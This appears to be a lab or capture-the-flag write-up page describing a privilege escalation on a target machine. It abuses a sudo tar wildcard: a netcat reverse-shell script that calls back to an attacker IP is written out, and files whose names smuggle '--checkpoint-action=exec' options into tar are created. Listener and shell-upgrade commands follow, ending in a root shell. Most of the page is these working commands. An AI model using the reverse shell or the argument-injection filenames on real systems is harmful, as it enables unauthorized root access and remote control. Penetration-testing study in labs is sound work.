privilege escalation

I can see that current user has tar command run permission with wildcard set. We can abuse it.

We can see that we can crate zip of all files and then save it in /tmp directory.

Exploiting Wildcard for Privilege EscalationHacking Articles

I got the way to abuse it.

Run below command in victim machine.

echo "mkfifo /tmp/lhennp; nc 192.168.45.242 80 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

The file was created successfully.

Start the listen at port 80.

sudo rlwrap -cAr nc -lnvp 80

Run the tar command.

Check the listener.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

Got the root shell.

Previousblaze login page [SQLi-initial]NextLocal.txt & proof.txt

Last updated 1 year ago